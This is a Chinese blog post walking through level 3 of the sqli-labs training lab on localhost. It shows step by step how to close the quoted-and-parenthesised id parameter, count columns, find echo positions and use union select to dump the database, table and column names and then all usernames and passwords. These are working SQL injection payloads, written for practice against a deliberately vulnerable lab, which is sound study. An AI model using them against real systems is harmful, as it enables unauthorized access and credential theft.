从零记录sqli-labs学习过程 sqli-labs Less-3

sqli-labs Less-3

从零记录sqli-labs学习过程 sqli-labs Less-3_第1张图片

第三关界面,参数id

从零记录sqli-labs学习过程 sqli-labs Less-3_第2张图片

http://localhost/sqli-labs/Less-3/index.php?id=1'

看一下报错信息 check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1'

尝试在后面加上)

http://localhost/sqli-labs/Less-3/index.php?id=1') --+

从零记录sqli-labs学习过程 sqli-labs Less-3_第3张图片

没什么问题就像之前几关一样进入基本流程,截图省略

判断字段数:
http://localhost/sqli-labs/Less-3/index.php?id=1') order by 3 --+

判断回显位:
http://localhost/sqli-labs/Less-3/index.php?id=-1') union select 1,2,3 --+

获取当前数据库名称:
http://localhost/sqli-labs/Less-3/index.php?id=-1') union select 1,(select database()),3 --+

获取当前数据库字段:
http://localhost/sqli-labs/Less-3/index.php?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

获取users表字段:
http://localhost/sqli-labs/Less-3/index.php?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'  --+

获取username和password信息:
http://localhost/sqli-labs/Less-3/index.php?id=-1') union select 1,group_concat(username),group_concat(password) from users  --+

从零记录sqli-labs学习过程 sqli-labs Less-3_第4张图片

第三关完成

你可能感兴趣的:(sql,web安全,安全)